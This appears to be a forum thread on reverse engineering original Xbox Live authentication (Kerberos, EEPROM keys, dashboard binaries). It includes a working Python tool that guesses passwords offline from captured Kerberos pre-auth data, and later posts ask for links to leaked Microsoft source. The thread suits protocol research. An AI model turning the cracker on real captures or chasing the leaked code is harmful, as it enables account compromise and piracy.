Work has calmed down a bit, so now I have time to get back into this. To make any significant progress I need to find the list of trusted keys the Xbox uses to connect to servers. I am going to go ahead and say this is probably in the dashboard binaries, as the dashboard binaries were updated when the Xbox Live features were added. But that is just speculation; I could be very wrong. So that's where I'm at now. I'm going to do some more research into where this information is located, but the dashboard is quite a bit to disassemble.
Probably the easiest way to find the keys is to use an FTP transfer cable, dump everything off the Xbox and comb through each file.
Now I know nothing about the inner workings of XBL, but for the sake of the thread I impart to you a post by the great m0skit0:
No real technical contribution in this post. Interesting stuff here. Xblob existed back in the Xbox 1 period, right? If you truly want it open source, I don't think you can read the XDK manuals; let someone extract the theories, and you write code against them, like the FAT file system and Linux. But hell, every time I start looking into this I still open up the XDK for easy testing. So maybe it's open source, but not legal, no direct Xbins download so to speak. (My English :'( )
I thought about this for the Xbox 360 a while ago, and I'm starting to look at it again. I really didn't accomplish anything due to my lack of networking knowledge, but I have read that a "HomeBrew-Net" Xbox Live environment has actually been made multiple times and applied to XDKs by using a modified ini to add the servers in the environment. Apparently the people who made it some years ago had partial functionality with signing in and things, but no games. Anyway, this seems like some cool stuff; good luck with this project!
I got a bit further today. The Xbox starts out by connecting to macs.xboxlive.com, where it verifies the serial number of the console. This is done via Kerberos, and the principals are set up as "serialnumber"@macs.xbox.com. Yes, the realm is macs.xbox.com, but the domain name is macs.xboxlive.com; I'm assuming the domain was changed afterwards. I can get an Xbox to log into a Linux Kerberos server, but I don't know the preauth password. It looks to be RC4 encrypted, which is not the hardest to break. I would just rather find out where the password is located / generated. I bet it is some other identification number than the serial, or perhaps it's private. I wonder if the servers hosting Xbox Live were Windows domain controllers; it's hard for me to imagine that. But again, it is Microsoft. EDIT: And lovely, my Xbox hard drive just crashed (click of death). Good thing I have a chip on its way.
Yes, from what I can gather MACS is for authorizing the serial numbers of the consoles, and AS.XBOXLIVE.COM is for user accounts. Although the Kerberos protocol is standard on the Xbox, the data is not. I can gather that some of it is RC4 encrypted, and I am unsure what the rest of the data is at the moment. Some of the console information is also transmitted in plain text. On another note, the Xbox is chipped and up and running.
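For readers following the two posts above: this is an added example, not code from the thread, from Microsoft, or from any Xbox binary. It shows how the "RC4 encrypted" pre-auth is built in standard Kerberos (RFC 4757, etype 23 RC4-HMAC): the key is MD4 of the UTF-16LE password (no salt), and the PA-ENC-TIMESTAMP blob is HMAC-MD5 checksum || RC4(K3, confounder || plaintext). Because the blob carries its own keyed checksum, a captured pre-auth can be checked offline against candidate passwords without talking to the KDC, which is exactly why the poster calls it "not the hardest to break". The function names, the sample plaintext, the confounder and the candidate list are all assumptions constructed for the example, and the thread itself says the Xbox payload is not standard, so nothing here is Xbox-specific.

```python
"""RFC 4757 RC4-HMAC (Kerberos etype 23) pre-authentication, pure Python.

Added example; function names are the example's own. MD4 is implemented here
because hashlib's md4 is disabled on many modern OpenSSL builds.
"""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KU_AS_REQ_PA_ENC_TS = 1  # key-usage number for PA-ENC-TIMESTAMP (RFC 4757 sec. 3)


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds of 16 steps over 512-bit blocks)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian

    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    f = lambda x, y, z: (x & y) | (~x & MASK32 & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = state
        for i in range(16):  # round 1: k = i, shifts 3,7,11,19
            a = rol((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: k = 0,4,8,12,1,5,9,13,..., shifts 3,5,9,13
            k = (i % 4) * 4 + i // 4
            a = rol((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: fixed k table, shifts 3,9,11,15
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_key(password: str) -> bytes:
    """RC4-HMAC string-to-key: MD4 of the UTF-16LE password, no salt (= NT hash)."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    # RFC 4757 sec. 5: K1 = HMAC-MD5(K, usage as 4-byte little-endian)
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encrypt: checksum = HMAC(K1, conf||pt); K3 = HMAC(K1, checksum);
    output = checksum || RC4(K3, conf||pt).  (K2 == K1 for the non-export etype.)"""
    if confounder is None:
        confounder = os.urandom(8)
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes) -> bytes:
    """Inverse of rc4_hmac_encrypt; raises ValueError if the keyed checksum fails."""
    if len(blob) < 24:
        raise ValueError("blob too short for checksum + confounder")
    k1 = _k1(key, usage)
    checksum, body = blob[:16], blob[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        raise ValueError("checksum mismatch: wrong key or tampered data")
    return data[8:]  # strip the 8-byte confounder


def recover_preauth_password(enc_timestamp: bytes, candidates) -> str:
    """Offline guess: the first candidate whose key makes the HMAC verify is the password."""
    for pw in candidates:
        try:
            rc4_hmac_decrypt(nt_key(pw), KU_AS_REQ_PA_ENC_TS, enc_timestamp)
            return pw
        except ValueError:
            continue
    return None


# Constructed stand-in for a captured PA-ENC-TIMESTAMP cipher field (assumption):
# a real one wraps a DER-encoded PA-ENC-TS-ENC; this just encrypts a bare timestamp
# under the password "password" with a fixed confounder so the blob is reproducible.
SAMPLE_PLAINTEXT = b"20110914203000Z"
SAMPLE_BLOB = rc4_hmac_encrypt(nt_key("password"), KU_AS_REQ_PA_ENC_TS,
                               SAMPLE_PLAINTEXT, confounder=bytes(range(8)))


def demo() -> str:
    return recover_preauth_password(SAMPLE_BLOB, ["xbox", "123456", "password"])


if __name__ == "__main__":
    print(nt_key("password").hex())  # 8846f7eaee8fb117ad06bdd830b7586c
    print(demo())                     # password
```

In a real capture the blob to feed `recover_preauth_password` is the `cipher` field of the PA-ENC-TIMESTAMP (padata-type 2) in the AS-REQ, which Wireshark shows under the Kerberos dissector; the checksum check fails for every wrong guess, so only the keyed HMAC, not a plaintext format, is needed to confirm a hit. Whatever the Xbox actually puts in that field, the key derivation is the part worth locating in the binary, since anything derived from public console data (a serial number, say) is guessable offline in exactly this way.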
Presumably Wireshark is your tool of choice for understanding the structured or lightly modified Kerberos protocol packets? Wireshark does have a quick-prototyping Lua packet dissector engine if you find you can piece apart the Xbox Kerberos. Others are looking at similar steps, e.g. https://forums.hak5.org/index.php?/...ts-with-wireshark-and-ettercap-g/#entry215432
Does anyone have any idea what information is actually contained in the EEPROM? I'm not home at the moment, but I had an idea revolving around the EEPROM.
Copy and paste from another site since I couldn't remember everything ...
* XBOX VERSION
* KERNEL VERSION
* RAM SIZE
* XBOX SERIAL
* MAC ADDRESS
* ONLINE KEY
* VIDEO STANDARD
* XBE REGION
* HDD KEY
* CONFOUNDER
* HDD MODEL
* HDD SERIAL
* HDD PASSWORD
* XBOX DVD MODEL
That would make a lot of sense. When disassembling XOnline.xbe you can't find a lot of references to a function that looks like it reads all of this data from the EEPROM. This should make it a bit easier to locate what it is using for authentication; hopefully it isn't a generated passphrase based on chaining variables.
The entire source code to Xbox Live leaked along with the kernel and SDK libraries. Disassembly is overkill =)
It showed up on Usenet years ago disguised as something else and went unnoticed. No idea if it's public now. Many BIOSes were based on the kernel source and not just hacked via the binary.
This sounds good. While XBConnect is good, I almost never see anyone online for the classic box. Those who are seem to be playing Halo only...
EDIT: Below is the original message, but at the current time we have found and shared multiple archives of kernel sources and more. I've been rereading this thread, and to prevent future readers from doing more reading than necessary: look for the 4400 and/or Barnabas sources. Other names and more archives probably exist. I've gotten multiple kinds of proof that those exist. I never found Live source, no kernel source at all, so if any names (of the obfuscated files) or old (dead) links are known, then I have leads to find files. News I knew of, and can still find, is about some "hackers" (more like crackers to me) having TeamViewer access and "leaked" usernames. No code or examples so far, no proof at all. Also unconfirmed claims that M$ blocked or silently removed any leads. If the source exists, and you have owned it, can you share how and/or (somewhat) where you found it? I am aware that some rules on the board may not allow linking to pirated software, so please PM me full links. Only by PM, but it's better to comply: give a hint, as I said, by names, release group names or Usenet host stuff. Google and Bing are no use so far. I have to consider this a hoax otherwise and continue (next to university) my own research/reverse engineering.